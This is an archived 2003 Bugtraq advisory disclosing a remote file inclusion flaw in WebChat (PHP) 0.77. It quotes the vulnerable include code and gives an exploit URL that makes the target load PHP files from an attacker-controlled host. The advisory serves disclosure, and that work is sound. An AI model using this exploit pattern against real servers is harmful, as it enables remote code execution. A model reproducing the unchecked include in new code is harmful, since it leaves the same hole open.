Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: WebChat (PHP)

WebChat (PHP)

From: Frog Man <leseulfrog_at_hotmail.com>
Date: Mon, 03 Mar 2003 13:57:43 +0100

Informations :
°°°°°°°°°°°°°°
Version : 0.77
Website : http://www.webdev.ro
Problem : File Including

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
defines.php :
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
         $WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
with :
http://[attacker]/db_mysql.php and
http://[attacker]/language/english.php

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))

More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/WebChat.txt

frog-m_at_n

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
Received on Mar 03 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos